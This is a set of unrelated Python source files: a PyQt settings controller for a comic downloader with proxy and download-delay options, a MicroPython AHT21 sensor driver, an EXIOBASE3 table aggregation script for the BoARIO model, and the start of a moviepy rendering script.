        self.ui.cbx_settings_cugan_denoise.addItems([TRSM("No effect"),TRSM("Level 0"),TRSM("Level 1"),TRSM("Level 2"),TRSM("Level 3")])
        self.ui.cbx_settings_cugan_resize.addItems([TRSM("No"),TRSM("Yes")])
        self.ui.cbx_settings_when_close_window.addItems([TRSM("Minimize to system tray"),TRSM("Close window")])
        # UI Display
        self.retranslateUi()
        self.load_config()
        # action
        self.ui.btn_settings_save.clicked.connect(self.btn_settings_save_clicked)
        self.ui.btn_settings_reset.clicked.connect(self.btn_settings_reset_clicked)
        self.ui.btn_settings_general_folder.clicked.connect(self.btn_settings_general_folder_clicked)
        self.ui.btn_settings_proxy_add.clicked.connect(self.btn_settings_proxy_add_clicked)
        self.ui.btn_settings_proxy_delete.clicked.connect(self.btn_settings_proxy_delete_clicked)
        self.ui.btn_settings_cugan_browser.clicked.connect(self.btn_settings_cugan_browser_clicked)
        self.ui.btn_settings_reader_background.clicked.connect(self.btn_settings_reader_background_clicked)
        self.ui.txt_settings_reader_background.textChanged.connect(self.txt_settings_reader_background_text_changed)
    def retranslateUi(self):
        """Re-apply translated captions to combo-box items (used on language change)."""
        self.ui.cbx_settings_reader_auto_play_pgb.setItemText(0,TRSM("No"))
        self.ui.cbx_settings_reader_auto_play_pgb.setItemText(1,TRSM("Yes"))
        self.ui.cbx_settings_proxy_mode.setItemText(0,TRSM("Disable proxy"))
        self.ui.cbx_settings_proxy_mode.setItemText(1,TRSM("Use proxy and not proxy same time"))
        self.ui.cbx_settings_proxy_mode.setItemText(2,TRSM("Only use proxy"))
        self.ui.cbx_settings_cugan_denoise.setItemText(0,TRSM("No effect"))
        self.ui.cbx_settings_cugan_denoise.setItemText(1,TRSM("Level 0"))
        self.ui.cbx_settings_cugan_denoise.setItemText(2,TRSM("Level 1"))
        self.ui.cbx_settings_cugan_denoise.setItemText(3,TRSM("Level 2"))
        self.ui.cbx_settings_cugan_denoise.setItemText(4,TRSM("Level 3"))
        self.ui.cbx_settings_cugan_resize.setItemText(0,TRSM("No"))
        self.ui.cbx_settings_cugan_resize.setItemText(1,TRSM("Yes"))
        self.ui.cbx_settings_when_close_window.setItemText(0,TRSM("Minimize to system tray"))
        self.ui.cbx_settings_when_close_window.setItemText(1,TRSM("Close window"))
        pass
    #action
    def btn_settings_general_folder_clicked(self):
        """Choose the download folder via a directory dialog."""
        old_folder_path = self.ui.txt_settings_general_folder.text()
        if old_folder_path == "":
            old_folder_path = "./"
        folder_path = QFileDialog.getExistingDirectory(self.main_controller,TRSM("Open folder"), old_folder_path)
        if folder_path != "":
            self.ui.txt_settings_general_folder.setText(folder_path)
        pass
    def btn_settings_reader_background_clicked(self):
        """Pick the reader background colour and update the preview label."""
        old_color = QColor(self.ui.txt_settings_reader_background.text())
        color = QColorDialog.getColor(old_color,self.main_controller,TRSM("Pick a color"))
        if color.isValid():
            color_name = color.name()
            self.ui.txt_settings_reader_background.setText(color_name)
            self.ui.lbl_settings_reader_background_preview.setStyleSheet("background-color: "+color_name+";")
    def btn_settings_cugan_browser_clicked(self):
        """Choose the Real-CUGAN executable via a file dialog."""
        old_file_path = self.ui.txt_settings_cugan_location.text()
        if old_file_path == "":
            old_file_path = "./"
        file_path = QFileDialog.getOpenFileName(self.main_controller,TRSM("EXE location"), old_file_path)
        # getOpenFileName returns a (path, selected_filter) tuple; index 0 is the path.
        if len(file_path) >= 2 and file_path[0] != "":
            self.ui.txt_settings_cugan_location.setText(file_path[0])
    def btn_settings_proxy_add_clicked(self):
        """Validate the typed proxy (type + ip:port) and append it to the list."""
        if self.ui.txt_settings_proxy_ip.text() != "":
            proxy = self.ui.cbx_settings_proxy_type.currentText() + "://" + self.ui.txt_settings_proxy_ip.text()
            if not self.check_proxy_format(proxy):
                util.msg_box(TRSM("Please enter a proxy with ip:port format"), self.main_controller)
            elif self.check_proxy_exist_in_list(proxy):
                util.msg_box(TRSM("Proxy already exist in list"), self.main_controller)
            else:
                self.try_add_proxy(proxy)
                self.ui.txt_settings_proxy_ip.setText("")
        else:
            util.msg_box(TRSM("Please enter a proxy with ip:port format"),self.main_controller)
        pass
    def btn_settings_proxy_delete_clicked(self):
        """Delete the selected proxies after user confirmation."""
        if len(self.ui.list_settings_proxy.selectedItems()) > 0:
            if util.confirm_box(TRSM("Confirm delete these proxy?"),self.main_controller):
                for item in self.ui.list_settings_proxy.selectedItems():
                    self.ui.list_settings_proxy.takeItem(self.ui.list_settings_proxy.row(item))
        else:
            util.msg_box(TRSM("Please select at least one proxy"),self.main_controller)
        pass
    def btn_settings_save_clicked(self):
        """Persist the current widget values (see save_config)."""
        self.save_config()
    def btn_settings_reset_clicked(self):
        """Restore every settings widget to its built-in default value (not saved yet)."""
        self.ui.spin_settings_max_retry.setValue(5)
        self.ui.spin_settings_timeout.setValue(30)
        self.ui.spin_settings_book_padding.setValue(2)
        self.ui.spin_settings_chapter_padding.setValue(3)
        self.ui.spin_settings_image_padding.setValue(3)
        self.ui.spin_settings_jpg_quality.setValue(90)
        self.ui.spin_settings_check_is_2_page.setValue(1.0)
        self.ui.txt_settings_reader_background.setText("#000000")
        self.ui.spin_settings_reader_auto_play_interval.setValue(5.0)
        self.ui.cbx_settings_reader_auto_play_pgb.setCurrentIndex(1)
        self.ui.spin_settings_reader_page_gap.setValue(0)
        self.ui.spin_settings_page_sleep.setValue(10)
        self.ui.spin_settings_image_sleep.setValue(1)
        self.ui.spin_settings_download_worker.setValue(2)
        self.ui.cbx_settings_proxy_mode.setCurrentIndex(0)
        self.ui.spin_settings_cugan_scale.setValue(2)
        self.ui.cbx_settings_cugan_denoise.setCurrentIndex(4)
        self.ui.cbx_settings_cugan_resize.setCurrentIndex(0)
        self.ui.cbx_settings_when_close_window.setCurrentIndex(0)
        pass
    def txt_settings_reader_background_text_changed(self):
        """Live-update the colour preview while the user types a colour string."""
        color_str = self.ui.txt_settings_reader_background.text()
        q_color = QColor(color_str)
        if q_color.isValid():
            self.ui.lbl_settings_reader_background_preview.setStyleSheet("background-color: " + color_str)
    # internal
    def load_config(self):
        """Copy every persisted setting from MY_CONFIG into the widgets."""
        #general
        download_folder = MY_CONFIG.get("general", "download_folder")
        self.ui.txt_settings_general_folder.setText(download_folder)
        max_retry = MY_CONFIG.get("general", "max_retry")
        self.ui.spin_settings_max_retry.setValue(int(max_retry))
        timeout = MY_CONFIG.get("general", "timeout")
        self.ui.spin_settings_timeout.setValue(float(timeout))
        self.ui.cbx_settings_user_agent.addItems([
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36",
        ])
        # "Mozilla/5.0 (iPad; CPU OS 8_0_2 like Mac OS X) AppleWebKit/60.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A405 Safari/600.1.4",
        # "Mozilla/5.0 (iPhone; CPU iPhone OS 13_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.2 Mobile/15E148 Safari/604.1",
        # "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.58 Mobile Safari/537.36"
        agent = MY_CONFIG.get("general", "agent")
        self.ui.cbx_settings_user_agent.setCurrentText(agent)
        book_padding = MY_CONFIG.get("general", "book_padding")
        self.ui.spin_settings_book_padding.setValue(int(book_padding))
        chapter_padding = MY_CONFIG.get("general", "chapter_padding")
        self.ui.spin_settings_chapter_padding.setValue(int(chapter_padding))
        image_padding = MY_CONFIG.get("general", "image_padding")
        self.ui.spin_settings_image_padding.setValue(int(image_padding))
        jpg_quality = MY_CONFIG.get("general", "jpg_quality")
        self.ui.spin_settings_jpg_quality.setValue(int(jpg_quality))
        check_is_2_page = MY_CONFIG.get("general", "check_is_2_page")
        self.ui.spin_settings_check_is_2_page.setValue(float(check_is_2_page))
        reader_background = MY_CONFIG.get("reader", "background")
        self.ui.txt_settings_reader_background.setText(reader_background)
        self.ui.lbl_settings_reader_background_preview.setStyleSheet("background-color:"+reader_background+";")
        reader_auto_play_interval = MY_CONFIG.get("reader", "auto_play_interval")
        self.ui.spin_settings_reader_auto_play_interval.setValue(float(reader_auto_play_interval))
        reader_auto_play_pgb = MY_CONFIG.get("reader", "auto_play_pgb")
        self.ui.cbx_settings_reader_auto_play_pgb.setCurrentIndex(int(reader_auto_play_pgb))
        reader_page_gap = MY_CONFIG.get("reader", "page_gap")
        self.ui.spin_settings_reader_page_gap.setValue(int(reader_page_gap))
        #anti ban
        page_sleep = MY_CONFIG.get("anti-ban", "page_sleep")
        self.ui.spin_settings_page_sleep.setValue(float(page_sleep))
        image_sleep = MY_CONFIG.get("anti-ban", "image_sleep")
        self.ui.spin_settings_image_sleep.setValue(float(image_sleep))
        download_worker = MY_CONFIG.get("anti-ban", "download_worker")
        self.ui.spin_settings_download_worker.setValue(int(download_worker))
        proxy_mode = MY_CONFIG.get("anti-ban", "proxy_mode")
        self.ui.cbx_settings_proxy_mode.setCurrentIndex(int(proxy_mode))
        proxy_list = MY_CONFIG.get("anti-ban", "proxy_list")
        # The proxy list is stored as a JSON array of {"enable": bool, "url": str}.
        if proxy_list != "":
            proxy_list = json.loads(proxy_list)
            for proxy in proxy_list:
                item = QListWidgetItem()
                item.setText(proxy["url"])
                item.setFlags(item.flags() | QtCore.Qt.ItemIsUserCheckable)
                if proxy["enable"]:
                    item.setCheckState(QtCore.Qt.Checked)
                else:
                    item.setCheckState(QtCore.Qt.Unchecked)
                self.ui.list_settings_proxy.addItem(item)
        #real-cugan
        exe_location = MY_CONFIG.get("real-cugan", "exe_location")
        self.ui.txt_settings_cugan_location.setText(exe_location)
        scale = int(MY_CONFIG.get("real-cugan", "scale"))
        self.ui.spin_settings_cugan_scale.setValue(scale)
        denoise_level = int(MY_CONFIG.get("real-cugan", "denoise_level"))
        # Stored levels run -1..3 ("no effect" is -1); combo indexes run 0..4.
        self.ui.cbx_settings_cugan_denoise.setCurrentIndex(denoise_level+1)
        resize = int(MY_CONFIG.get("real-cugan", "resize"))
        self.ui.cbx_settings_cugan_resize.setCurrentIndex(resize)
        #misc
        display_message = MY_CONFIG.get("misc", "display_message")
        if display_message == "False":
            self.ui.radio_settings_message_no.setChecked(True)
        else:
            self.ui.radio_settings_message_yes.setChecked(True)
        play_sound = MY_CONFIG.get("misc", "play_sound")
        if play_sound == "False":
            self.ui.radio_settings_sound_no.setChecked(True)
        else:
            self.ui.radio_settings_sound_yes.setChecked(True)
        when_close_window = MY_CONFIG.get("misc", "when_close_window")
        self.ui.cbx_settings_when_close_window.setCurrentIndex(int(when_close_window))
        pass
    def save_config(self):
        """Write every widget value back to MY_CONFIG, save it, and re-apply
        the networking settings to the shared WEB_BOT / worker pool."""
        global WEB_BOT, EXECUTOR
        #print("try save")
        #general
        MY_CONFIG.set("general","download_folder",self.ui.txt_settings_general_folder.text())
        MY_CONFIG.set("general","max_retry",str(self.ui.spin_settings_max_retry.value()))
        MY_CONFIG.set("general","timeout",str(self.ui.spin_settings_timeout.value()))
        MY_CONFIG.set("general","agent",self.ui.cbx_settings_user_agent.currentText())
        MY_CONFIG.set("general","book_padding",str(self.ui.spin_settings_book_padding.value()))
        MY_CONFIG.set("general","chapter_padding",str(self.ui.spin_settings_chapter_padding.value()))
        MY_CONFIG.set("general","image_padding",str(self.ui.spin_settings_image_padding.value()))
        MY_CONFIG.set("general","jpg_quality",str(self.ui.spin_settings_jpg_quality.value()))
        MY_CONFIG.set("general","check_is_2_page",str(self.ui.spin_settings_check_is_2_page.value()))
        MY_CONFIG.set("reader","background",self.ui.txt_settings_reader_background.text())
        MY_CONFIG.set("reader","auto_play_interval",str(self.ui.spin_settings_reader_auto_play_interval.value()))
        MY_CONFIG.set("reader","auto_play_pgb",str(self.ui.cbx_settings_reader_auto_play_pgb.currentIndex()))
        MY_CONFIG.set("reader","page_gap",str(self.ui.spin_settings_reader_page_gap.value()))
        #anti ban
        MY_CONFIG.set("anti-ban","page_sleep",str(self.ui.spin_settings_page_sleep.value()))
        MY_CONFIG.set("anti-ban","image_sleep",str(self.ui.spin_settings_image_sleep.value()))
        MY_CONFIG.set("anti-ban","download_worker",str(self.ui.spin_settings_download_worker.value()))
        MY_CONFIG.set("anti-ban","proxy_mode",str(self.ui.cbx_settings_proxy_mode.currentIndex()))
        MY_CONFIG.set("anti-ban","proxy_list",json.dumps(self.proxy_list_to_json()))
        #real-cugan
        MY_CONFIG.set("real-cugan","exe_location",self.ui.txt_settings_cugan_location.text())
        MY_CONFIG.set("real-cugan","scale",str(self.ui.spin_settings_cugan_scale.value()))
        # Reverse of load_config: combo index 0..4 maps back to level -1..3.
        MY_CONFIG.set("real-cugan","denoise_level",str(self.ui.cbx_settings_cugan_denoise.currentIndex()-1))
        MY_CONFIG.set("real-cugan","resize",str(self.ui.cbx_settings_cugan_resize.currentIndex()))
        #misc
        MY_CONFIG.set("misc","display_message",str(self.ui.radio_settings_message_yes.isChecked()))
        MY_CONFIG.set("misc","play_sound",str(self.ui.radio_settings_sound_yes.isChecked()))
        MY_CONFIG.set("misc","when_close_window",str(self.ui.cbx_settings_when_close_window.currentIndex()))
        MY_CONFIG.save()
        WEB_BOT.set_agent(MY_CONFIG.get("general", "agent"))
        WEB_BOT.set_time_out(float(MY_CONFIG.get("general", "timeout")))
        WEB_BOT.set_max_retry(int(MY_CONFIG.get("general", "max_retry")))
        WEB_BOT.set_proxy_mode(int(MY_CONFIG.get("anti-ban", "proxy_mode")))
        WEB_BOT.set_proxy_list(MY_CONFIG.get("anti-ban", "proxy_list"))
        # NOTE(review): this rebinds EXECUTOR in this module only (via the
        # 'global' above); the previous pool is not shut down -- verify other
        # modules see the new pool.
        EXECUTOR = concurrent.futures.ThreadPoolExecutor(max_workers=int(MY_CONFIG.get("anti-ban", "download_worker")))
    def try_add_proxy(self,proxy):
        """Append *proxy* (checked/enabled) to the list widget; False if it already exists."""
        if self.check_proxy_exist_in_list(proxy):
            return False
        item = QListWidgetItem()
        item.setText(proxy)
        item.setFlags(item.flags() | QtCore.Qt.ItemIsUserCheckable)
        item.setCheckState(QtCore.Qt.Checked)
        self.ui.list_settings_proxy.addItem(item)
        return True
    def check_proxy_format(self,proxy):
        """Return True when *proxy* matches http(s)://host:port."""
        pattern_proxy = re.compile(r'http([s]?)://(.*?):([0-9]*)')
        proxy_info = re.findall(pattern_proxy, proxy)
        if len(proxy_info) == 1 and len(proxy_info[0]) == 3:
            return True
        return False
    def check_proxy_exist_in_list(self,proxy):
        """Return True when *proxy* is already present in the proxy list widget."""
        for i in range(self.ui.list_settings_proxy.count()):
            item = self.ui.list_settings_proxy.item(i)
            if item.text() == proxy:
                return True
        return False
    def proxy_list_to_json(self):
        """Serialize the proxy list widget to [{"enable": bool, "url": str}, ...]."""
        result = []
        for i in range(self.ui.list_settings_proxy.count()):
            item = self.ui.list_settings_proxy.item(i)
            result.append({
                "enable": item.checkState() == QtCore.Qt.Checked,
                "url": item.text(),
            })
        return result
| freedy82/Comic-Toolbox | models/controllers/settings_controller.py | settings_controller.py | py | 14,876 | python | en | code | 13 | github-code | 36 |
20322614716 | import machine
import time
class AHT21:
    """
    Lightweight class for communicating with an AHT21 temperature and humidity sensor via I2C.
    AHT21 Datasheet:
    http://www.aosong.com/userfiles/files/media/AHT21%20%E8%8B%B1%E6%96%87%E7%89%88%E8%AF%B4%E6%98%8E%E4%B9%A6%20A0%202020-12-8.pdf
    Code inspired by:
    https://github.com/any-sliv/aht21_python_pigpio/blob/main/aht21.py
    https://github.com/Thinary/AHT_Sensor/blob/main/AHT_Sensor/src/Thinary_AHT_Sensor.cpp
    """
    def __init__(self, i2c:machine.I2C, address = 0x38):
        """
        Creates a new instance of the AHT21 class
        :param i2c: Setup machine.I2C interface
        :param address: The I2C address of the AHT21 slave device (0x38 is the factory default)
        """
        self.i2c = i2c
        self.address = address
        self.initialize()
    def initialize(self) -> None:
        """Initializes (calibrates) the AHT21 sensor"""
        # 0xBE 0x08 0x00: initialization/calibration command sequence.
        self.i2c.writeto(self.address, bytes([0xbe, 0x08, 0x00]))
        time.sleep(0.1)
        # 0x71: request the one-byte status register.
        self.i2c.writeto(self.address, bytes([0x71]))
        init_check = self.i2c.readfrom(self.address, 1)
        # NOTE(review): masking with 0x68 and comparing to 0x08 means "busy/mode
        # bits clear and calibration bit set" -- confirm against the datasheet's
        # status-word table.
        if not init_check[0] & 0x68 == 0x08:
            raise Exception ("Initialization of AHT21 failed!")
    def read(self) -> tuple[float, float]:
        """Reads the relative humidity (as a percentage) and temperature (in degrees celsius) as a tuple, in that order."""
        # 0xAC 0x33 0x00: trigger a measurement, then wait for it to complete.
        self.i2c.writeto(self.address, bytes([0xac, 0x33, 0x00]))
        time.sleep(0.2)
        # 6 bytes: status, then 20 bits humidity and 20 bits temperature
        # packed across bytes 1-5 (byte 3 is shared between the two values).
        res = self.i2c.readfrom(self.address, 6)
        # Relative humidity, as a percentage (raw 20-bit value / 2^20 * 100)
        rh = ((res[1] << 16) | (res[2] << 8) | res[3]) >> 4;
        rh = (rh * 100) / 1048576
        # Temperature, in celsius (raw 20-bit value / 2^20 * 200 - 50)
        temp = ((res[3] & 0x0F) << 16) | (res[4] << 8) | res[5];
        temp = ((200 * temp) / 1048576) - 50
        return (rh, temp)
| TimHanewich/Air-Quality-IoT | src/AHT21.py | AHT21.py | py | 1,880 | python | en | code | 0 | github-code | 36 |
18174515063 | import os
import sys
import pathlib
import pandas as pd
import pymrio as pym
import pickle as pkl
import logging
import argparse
import json
import re
from pymrio.core.mriosystem import IOSystem
# Workbooks expected inside the user-supplied source directory.
SEC_AGG_ODS_FILENAME = "exiobase3_aggregate_to_7_sectors.ods"
PARAMS_ODS_FILENAME ="exiobase3_7_sectors_params.ods"
# EXIOBASE3 monetary unit (one table cell = 10^6 currency units).
EXIO3_MONETARY = 1000000
# Default main inventory duration, in days.
MAIN_INVENTORY_DURATION = 90
# Default simulation parameters written to params.json (see BoARIO docs).
PARAMS = {
    # The directory to use to store results (relative to output_dir)
    "results_storage": "results",
    # This tells the model to register the evolution of the stocks
    # of every industry (the file can be quite large (2Gbytes+ for
    # a 365 days simulation with exiobase))
    "register_stocks": True,
    # Parameters of the model (we detail these in the documentation)
    "psi_param": 0.85,
    "order_type": "alt",
    # Time division of a year in the model (365 == day, 52 == week, ...)
    "year_to_temporal_unit_factor": 365,
    # Number of day|week|... of one step of the model (ie time sampling)
    "n_temporal_units_by_step": 1,
    # Charateristic time of inventory restoration
    "inventory_restoration_tau": 60,
    # Base overproduction factor
    "alpha_base": 1.0,
    # Maximum overproduction factor
    "alpha_max": 1.25,
    # Charateristic time of overproduction
    "alpha_tau": 365,
    # Charateristic time of rebuilding
    "rebuild_tau": 60,
    # Number of day|week|... to simulate
    "n_temporal_units_to_sim": 700,
    # Unused
    "min_duration": 700
}
def lexico_reindex(mrio: pym.IOSystem) -> pym.IOSystem:
    """Sort the dataframes of a :ref:`pymrio.IOSystem` lexicographically.

    The Z, Y and A matrices are reordered on both their index and their
    columns; the production vector x only has an index to reorder.  The
    system is mutated in place and also returned for convenience.

    Parameters
    ----------
    mrio : pym.IOSystem
        The IOSystem to sort

    Returns
    -------
    pym.IOSystem
        The sorted IOSystem
    """
    for attr_name in ("Z", "Y", "A"):
        matrix = getattr(mrio, attr_name)
        matrix = matrix.reindex(sorted(matrix.index), axis=0)
        matrix = matrix.reindex(sorted(matrix.columns), axis=1)
        setattr(mrio, attr_name, matrix)
    mrio.x = mrio.x.reindex(sorted(mrio.x.index), axis=0)  # type: ignore
    return mrio
def full_mrio_pickle(exio3, save_path=None):
    """Strip a freshly parsed EXIOBASE3 IOSystem down to the attributes the
    model needs, recompute the missing IO components, sort it, and pickle it.

    NOTE(review): the exio3 object is mutated in place (attributes are
    deleted), and save_path has a default of None although
    pathlib.Path(None) below would raise -- a real path is effectively
    required; confirm callers always pass one.
    """
    scriptLogger.info("Removing IOSystem attributes deemed unnecessary")
    # Whitelist of attributes to keep; everything else is deleted to shrink
    # the pickle (iterate over a snapshot since we mutate __dict__).
    attr = ['Z', 'Y', 'x', 'A', 'L', 'unit', 'population', 'meta', '__non_agg_attributes__', '__coefficients__', '__basic__']
    tmp = list(exio3.__dict__.keys())
    for at in tmp:
        if at not in attr:
            delattr(exio3,at)
    assert isinstance(exio3, IOSystem)
    scriptLogger.info("Done")
    scriptLogger.info("Computing the missing IO components")
    exio3.calc_all()
    scriptLogger.info("Done")
    scriptLogger.info("Reindexing the dataframes lexicographicaly")
    exio3 = lexico_reindex(exio3)
    scriptLogger.info("Done")
    scriptLogger.info("Saving Full mrio pickle file to {}".format(pathlib.Path(save_path).absolute()))
    # Second call is redundant but harmless (lexico_reindex is idempotent).
    exio3 = lexico_reindex(exio3)
    with open(save_path, 'wb') as f:
        pkl.dump(exio3, f)
def aggreg_mrio_pickle(full_exio_path, sector_aggregator_path, save_path=None):
    """Aggregate a pickled EXIOBASE3 IOSystem to the 7-sector grouping and pickle it.

    Parameters
    ----------
    full_exio_path : str or pathlib.Path
        Pickle produced by :func:`full_mrio_pickle`.
    sector_aggregator_path : str or pathlib.Path
        ODS workbook with an "aggreg_input" sheet (sector -> group id vector)
        and a "name_input" sheet (group id -> new sector name).
    save_path : str or pathlib.Path
        Where to write the aggregated pickle.

    Raises
    ------
    FileNotFoundError
        If *full_exio_path* does not exist.
    """
    exio_path = pathlib.Path(full_exio_path)
    if not exio_path.exists():
        raise FileNotFoundError("Exiobase file not found - {}".format(exio_path))
    with exio_path.open('rb') as f:
        scriptLogger.info("Loading EXIOBASE3 from {}".format(exio_path.resolve()))
        exio3 = pkl.load(f)
    assert isinstance(exio3, IOSystem)
    sec_agg_vec = pd.read_excel(sector_aggregator_path, sheet_name="aggreg_input", engine="odf")
    # pandas >= 2.0 removed read_excel's ``squeeze`` keyword; calling
    # DataFrame.squeeze("columns") afterwards is the version-proof
    # equivalent and still yields a Series for a single-column sheet.
    sec_agg_newnames = pd.read_excel(sector_aggregator_path, sheet_name="name_input", engine="odf", index_col=0).squeeze("columns")
    sec_agg_vec = sec_agg_vec.sort_values(by="sector")
    scriptLogger.info("Reading aggregation matrix from sheet 'input' in file {}".format(pathlib.Path(sector_aggregator_path).absolute()))
    scriptLogger.info("Aggregating from {} to {} sectors".format(len(exio3.get_sectors()), len(sec_agg_vec.group.unique()))) #type:ignore
    # Map each original sector's group id to its human-readable new name.
    sec_agg_vec['new_sectors'] = sec_agg_vec.group.map(sec_agg_newnames.to_dict())
    exio3.aggregate(sector_agg=sec_agg_vec.new_sectors.values)
    exio3.calc_all()
    scriptLogger.info("Done")
    scriptLogger.info("Saving to {}".format(pathlib.Path(save_path).absolute()))
    exio3 = lexico_reindex(exio3)
    with open(save_path, 'wb') as f:
        pkl.dump(exio3, f)
def params_from_ods(ods_file, monetary, main_inv_dur):
    """Read the sector-parameter workbook and build the MRIO parameter dict.

    The workbook must contain the columns "Aggregated version sector",
    "Capital to VA ratio" and "Inventory size (days)".
    """
    df = pd.read_excel(ods_file)  # type: ignore
    sector_col = "Aggregated version sector"
    def _column_as_dict(value_col):
        # {sector name: value} mapping for one parameter column.
        return df[[sector_col, value_col]].set_index(sector_col).to_dict()[value_col]
    return {
        "monetary_factor": monetary,
        "main_inv_dur": main_inv_dur,
        "capital_ratio_dict": _column_as_dict("Capital to VA ratio"),
        "inventories_dict": _column_as_dict("Inventory size (days)"),
    }
def event_tmpl_from_ods(ods_file):
    """Build a template event dict from the sector-parameter workbook.

    Affected sectors are the rows whose "Affected" cell is "yes";
    rebuilding sectors are the rows with a strictly positive
    "Rebuilding factor", mapped to that factor.  All other fields are
    fixed template values.
    """
    df = pd.read_excel(ods_file)  # type: ignore
    sector_col = "Aggregated version sector"
    affected = df.loc[df.Affected == "yes", sector_col].to_list()
    rebuilding = (
        df.loc[df["Rebuilding factor"] > 0, [sector_col, "Rebuilding factor"]]
        .set_index(sector_col)
        .to_dict()["Rebuilding factor"]
    )
    return {
        "aff_regions": ["FR"],
        "dmg_distrib_regions": [1],
        "dmg_distrib_sectors_type": "gdp",
        "dmg_distrib_sectors": [],
        "duration": 5,
        "name": "Test-event",
        "occur": 7,
        "q_dmg": 1000000,
        "aff_sectors": affected,
        "rebuilding_sectors": rebuilding,
    }
# Command-line interface.  NOTE(review): parse_args() is called here at
# import time AND again inside the __main__ block below; the duplicate call
# is harmless but redundant -- confirm before removing either one.
parser = argparse.ArgumentParser(description="Build a minimal example for BoARIO, from EXIOBASE3 MRIO table zip file")
parser.add_argument('source_path', type=str, help='The str path to the directory with source materials')
parser.add_argument('-o', "--output", type=str, help='The path to the example directory to create', nargs='?', default='./testing-directory/')
args = parser.parse_args()
# Console-only logger for this script (propagation disabled so messages are
# not duplicated by the root logger).
logFormatter = logging.Formatter("%(asctime)s [%(levelname)-5.5s] %(name)s %(message)s", datefmt="%H:%M:%S")
scriptLogger = logging.getLogger("EXIOBASE3_Minimal_example_generator")
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
scriptLogger.addHandler(consoleHandler)
scriptLogger.setLevel(logging.INFO)
scriptLogger.propagate = False
if __name__ == '__main__':
    # Each artefact below is only (re)built when missing, so the script can
    # be re-run cheaply after a partial failure.
    args = parser.parse_args()
    scriptLogger.info("Make sure you use the same python environment when you use the minimal example as now.")
    scriptLogger.info("Your current environment is: {}".format(sys.executable))
    sec_agg_ods = pathlib.Path(args.source_path)/SEC_AGG_ODS_FILENAME
    params_ods = pathlib.Path(args.source_path)/PARAMS_ODS_FILENAME
    output_dir = pathlib.Path(args.output)
    # Create full mrio pickle file
    if not output_dir.exists():
        output_dir.mkdir(parents=True, exist_ok=True)
    full_exio_pickle_name = "exiobase3_full.pkl"
    minimal_exio_name = "exiobase3_minimal.pkl"
    params_file_name = "params.json"
    mrio_params_file_name = "mrio_params.json"
    event_file_name = "event.json"
    scriptLogger.info("This will create the following directory, with all required files for the minimal example : {}".format(output_dir.resolve()))
    # Both ODS workbooks are mandatory inputs.
    if not sec_agg_ods.exists():
        raise FileNotFoundError("Sector aggregator ods file not found - {}".format(sec_agg_ods))
    if not params_ods.exists():
        raise FileNotFoundError("Params ods file not found - {}".format(params_ods))
    if not (output_dir/full_exio_pickle_name).exists():
        # Locate the EXIOBASE3 archive (IOT_<year>_ixi.zip) anywhere under
        # the source directory; the last match found wins.
        regex = re.compile(r"(IOT_\d\d\d\d_ixi.zip)")
        exio_path = None
        for root, dirs, files in os.walk(args.source_path):
            scriptLogger.info("Looking for Exiobase3 file here {}".format(args.source_path))
            for f in files:
                if regex.match(f):
                    exio_path = (pathlib.Path(args.source_path)/f).resolve()
                    scriptLogger.info("Found Exiobase3 file here {}".format(exio_path))
                    break
        if exio_path is None:
            raise FileNotFoundError("Exiobase file not found in given source directory - {}".format(args.source_path))
        scriptLogger.info("Parsing EXIOBASE3 from {} - Note that this takes a few minutes on a powerful laptop. ".format(exio_path.resolve()))
        exio3 = pym.parse_exiobase3(path=exio_path)
        full_mrio_pickle(exio3, save_path=output_dir/full_exio_pickle_name)
    # create minimal mrio pickle file
    if not (output_dir/minimal_exio_name).exists():
        aggreg_mrio_pickle(output_dir/full_exio_pickle_name, sector_aggregator_path=sec_agg_ods, save_path=output_dir/minimal_exio_name)
    # create params file
    if not (output_dir/params_file_name).exists():
        scriptLogger.info("Generating simulation parameters file : {}".format((output_dir/params_file_name).resolve()))
        # NOTE(review): 'params' aliases the module-level PARAMS dict, so the
        # "output_dir" key is added to the global constant as well.
        params = PARAMS
        params["output_dir"] = str(output_dir.resolve())
        with (output_dir/params_file_name).open("w") as f:
            json.dump(params, f, indent=4)
    # create mrio_params_file
    if not (output_dir/mrio_params_file_name).exists():
        scriptLogger.info("Generating mrio parameters file : {}".format((output_dir/mrio_params_file_name).resolve()))
        mrio_params = params_from_ods(params_ods, EXIO3_MONETARY, MAIN_INVENTORY_DURATION)
        with (output_dir/mrio_params_file_name).open("w") as f:
            json.dump(mrio_params, f, indent=4)
    # create event file
    if not (output_dir/event_file_name).exists():
        scriptLogger.info("Generating event file : {}".format((output_dir/event_file_name).resolve()))
        event_params = event_tmpl_from_ods(params_ods)
        with (output_dir/event_file_name).open("w") as f:
            json.dump(event_params, f, indent=4)
    scriptLogger.info("Done !")
| spjuhel/BoARIO | scripts/generate-example-files.py | generate-example-files.py | py | 10,120 | python | en | code | 6 | github-code | 36 |
36839090820 | import moviepy.editor as me
import numpy as np
from bm_analyze import *
import time
# Load the per-frame matrix strings (one Bashicu-matrix string per line).
t=open('!r_data.txt')
M=t.read().split('\n')
t.close()
del t
# Line 0 is replaced by the sentinel understood by parseMatrix().
M[0]='[empty]'
# Frame window to render, and playback speed (data frames per video second).
start=36000
end=37000
speed=16
# NOTE(review): fixed 2-minute delay before rendering starts -- presumably to
# let another process finish writing !r_data.txt; confirm it is still needed.
time.sleep(120)
# Black 1080p background clip covering the whole rendered window.
render=me.VideoClip(lambda t:np.zeros([1080,1920,3]),duration=(end-start)/speed)#+3*(q+1==k))
clips=[render]
print('Finished making a void')
def parseMatrix(M):
    """Parse one matrix-string line into a list of columns (lists of ints).

    The sentinel '[empty]' yields [] and the sentinel 'Limit' yields [[1]].
    Anything else has the form '(a,b,...)(c,d,...)...', possibly with '?'
    markers, which are stripped before parsing.
    """
    if M == '[empty]':
        return []
    if M == 'Limit':
        return [[1]]
    # ast.literal_eval only accepts Python literals, so (unlike the original
    # eval) a malformed or hostile data line cannot execute arbitrary code.
    import ast
    return ast.literal_eval("[" + M.replace(")(", "],[").replace("(", "[").replace(")", "]").replace("?", "") + "]")
